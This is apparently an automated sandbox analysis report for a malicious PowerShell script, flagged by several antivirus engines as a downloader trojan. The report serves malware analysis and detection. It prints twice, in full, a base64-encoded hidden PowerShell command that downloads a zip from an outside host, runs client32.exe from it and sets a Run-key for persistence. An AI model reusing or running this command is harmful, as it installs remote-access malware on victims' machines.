Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 18, 2023, 9:33 a.m.	May 18, 2023, 9:38 a.m.

Size	2.2KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`3185d0e0c60786bcbdf7b6f23bc97448`
SHA256	`368d74adbbf7fc8398d9bebe64f10275c0caac68703ccdb1c3cbef52fe7db900`
CRC32	`A46FFDBD`
ssdeep	`48:gGfKBfS1vmLtvvluC07lyvpPIos/58ElawZFFq4aBM4T/:gGfKBfS1vmvUlyvSog58ElawZFFOMo`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\file2.ps1
1188
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAG8AYgB0AHQAZQBjAGgALgBjAG8AbQAuAHYAbgAvAGIAbABkAG0AZQAuAHAAaABwACcAOwAgACQAcgBuAHUAbQA9AEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAByAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAYwBoAHIAcwA9ACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABzAHQAdQB2AHcAeAB5AHoAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABSAFMAVABVAFYAVwBYAFkAWgAnADsAIAAkAHIAcwB0AHIAPQAnACcAOwAgACQAcgBhAG4APQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGEAbgBkAG8AbQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJAByAG4AdQBtADsAIAAkAGkAKwArACkAIAB7ACQAcgBzAHQAcgArAD0AJABjAGgAcgBzAFsAJAByAGEAbgAuAG4AZQB4AHQAKAAwACwAIAAkAGMAaAByAHMALgBMAGUAbgBnAHQAaAApAF0AfQA7ACAAJAByAHoAaQBwAD0AJAByAHMAdAByACsAJwAuAHoAaQBwACcAOwAgACQAcABhAHQAaAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAJwBcACcAKwAkAHIAegBpAHAAOwAgACQAcAB6AGkAcAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAJwBcAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAFMAdABhAHIAdAAtAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByACAALQBTAG8AdQByAGMAZQAgACQAbABpAG4AawAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABQAGEAdABoADsAIABlAHgAcABhAG4AZAAtAGEAcgBjAGgAaQB2AGUAIAAtAHAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJABwAHoAaQBwADsAIAAkAEYATwBMAEQAPQBHAGUAdAAtAEkAdABlAG0AIAAkAHAAegBpAHAAIAAtAEYAbwByAGMAZQA7ACAAJABGAE8ATABEAC4AYQB0AHQAcgBpAGIAdQB0AGUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABwAGEAdABoADsAIABjAGQAIAAkAHAAegBpAHAAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIAAkAGYAcwB0AHIAPQAkAHAAegBpAHAAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAJAByAG4AbQA9ACcATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQBfACcAKwAkAHIAcgBuAHUAbQA7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACQAcgBuAG0AIAAtAFYAYQBsAHUAZQAgACQAZgBzAHQAcgAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==
  2172

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2023, 9:33 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 18, 2023, 9:33 a.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005806a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00580da0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2023, 9:33 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (24 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 1188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02479000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02272000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02871000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02273000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02274000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02292000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02275000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02276000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAG8AYgB0AHQAZQBjAGgALgBjAG8AbQAuAHYAbgAvAGIAbABkAG0AZQAuAHAAaABwACcAOwAgACQAcgBuAHUAbQA9AEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAByAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAYwBoAHIAcwA9ACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABzAHQAdQB2AHcAeAB5AHoAQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABSAFMAVABVAFYAVwBYAFkAWgAnADsAIAAkAHIAcwB0AHIAPQAnACcAOwAgACQAcgBhAG4APQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGEAbgBkAG8AbQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJAByAG4AdQBtADsAIAAkAGkAKwArACkAIAB7ACQAcgBzAHQAcgArAD0AJABjAGgAcgBzAFsAJAByAGEAbgAuAG4AZQB4AHQAKAAwACwAIAAkAGMAaAByAHMALgBMAGUAbgBnAHQAaAApAF0AfQA7ACAAJAByAHoAaQBwAD0AJAByAHMAdAByACsAJwAuAHoAaQBwACcAOwAgACQAcABhAHQAaAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAJwBcACcAKwAkAHIAegBpAHAAOwAgACQAcAB6AGkAcAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAJwBcAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAFMAdABhAHIAdAAtAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByACAALQBTAG8AdQByAGMAZQAgACQAbABpAG4AawAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJABQAGEAdABoADsAIABlAHgAcABhAG4AZAAtAGEAcgBjAGgAaQB2AGUAIAAtAHAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJABwAHoAaQBwADsAIAAkAEYATwBMAEQAPQBHAGUAdAAtAEkAdABlAG0AIAAkAHAAegBpAHAAIAAtAEYAbwByAGMAZQA7ACAAJABGAE8ATABEAC4AYQB0AHQAcgBpAGIAdQB0AGUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABwAGEAdABoADsAIABjAGQAIAAkAHAAegBpAHAAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIAAkAGYAcwB0AHIAPQAkAHAAegBpAHAAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAJAByAG4AbQA9ACcATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQBfACcAKwAkAHIAcgBuAHUAbQA7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACQAcgBuAG0AIAAtAFYAYQBsAHUAZQAgACQAZgBzAHQAcgAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACcAUwB0AHIAaQBuAGcAJwA7AA==

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2023, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 14 AntiVirus engines on VirusTotal as malicious (14 events)

MicroWorld-eScan	Trojan.Generic.33735175
FireEye	Trojan.Generic.33735175
ALYac	Trojan.Generic.33735175
Arcabit	Trojan.Generic.D202C207
ESET-NOD32	PowerShell/TrojanDownloader.Agent.GXB
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.Generic.33735175
Tencent	Win32.Trojan-Downloader.Downloader.Edhl
Emsisoft	Trojan.Generic.33735175 (B)
MAX	malware (ai score=82)
Gridinsoft	Trojan.U.NetSupport.bot
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Trojan.Generic.33735175

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-nop				value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

file2.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All